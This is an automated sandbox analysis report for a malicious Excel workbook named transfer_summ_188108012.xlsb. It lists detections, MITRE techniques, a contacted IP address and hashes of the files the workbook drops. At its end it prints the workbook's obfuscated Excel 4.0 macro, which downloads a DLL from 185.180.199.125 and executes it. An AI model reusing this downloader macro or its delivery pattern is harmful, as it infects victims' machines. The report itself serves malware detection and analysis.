Analysis Report transfer_summ_188108012.xlsb
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | DLL Side-Loading1 | Process Injection1 | Regsvr321 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Masquerading1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.180.199.125 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONSUS | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 433175 |
Start date: | 11.06.2021 |
Start time: | 12:15:10 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | transfer_summ_188108012.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSB@3/9@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.180.199.125 | Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTING-SOLUTIONSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.369099616380359 |
Encrypted: | false |
SSDEEP: | 1536:5cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:lEQ9DQW+ziXOe |
MD5: | 6FBCC10A912548F46EA8F1F31FDC9246 |
SHA1: | 09BE2ADC4C58CD7CC82E6E634B78FBC0E8F25422 |
SHA-256: | 71BCE31715BD4766156E7029E2277237F599BC75BF481AE149A6320D7357D772 |
SHA-512: | 2D82788DF7709AC6D75DC21469435A3494A5DF06B4FCCA15B3EFA86D536B64E36E701F8CE53E01E3E779241596B68B1772BEE519317D1A066414CA933CC9396B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 79256 |
Entropy (8bit): | 7.8964489993388405 |
Encrypted: | false |
SSDEEP: | 1536:9+milem3l7eO+dRRVnyYPlMVGoIahaDHTU6hryF70cAeWvijWGH+:9+wol7eO6RSYP2sTU2yF70cAijW2+ |
MD5: | 9C99DB073DF24659166A16FCC7880B8A |
SHA1: | 11786CBF732FF35B91E1D43E3085FD6538986E80 |
SHA-256: | B796DA44A4EBEB360F9FBC112775F4F292D09E8BAF4593C787594C207F8FE6D7 |
SHA-512: | C03E25E596AD197C259B98D2DFA854F12518DA2BF67414689E0451F5CC0E7F4F128E47DB83385DC59F06256F73FDF597C8CCDB0EC3B1688050FA4A07C2AED235 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.875825877556854 |
TrID: |
|
File name: | transfer_summ_188108012.xlsb |
File size: | 63444 |
MD5: | 1b248ad3215a78ee6b006f3aa6bc68d7 |
SHA1: | 68d5e1de3e7a2f2a8ef3068e6ca84675388263fd |
SHA256: | 5b01a95d0fd0be91d68e35bc0d9c273eefadd24453c80a1a3a2ed3436f13220e |
SHA512: | dcf17dc636641e16c31f99769674329ebb7212ba793199cf7489c1327628f340b3b403cedaf67895a9af803d30b276b38fcdc0d143b3f4c9c3002d1324ad6284 |
SSDEEP: | 1536:eMTMXwc5jlMVGoIahaDHTU6hryF70liWWGH0AeWca:eMTi5j2sTU2yF70liWW20Ra |
File Content Preview: | PK..........!..<......z.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "transfer_summ_188108012.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
CALL(UR, UR, JJC, 0, ht, ..\jbeiwmje.dll, 0, 0)
,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,185.180.199.125/s1.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\jbeiwmje.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(before.2.18.42.sheet!BK73&before.2.18.42.sheet!BK74&before.2.18.42.sheet!BK75&before.2.18.42.sheet!BN24),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT()"=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.2.18.42.sheet!BZ25(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,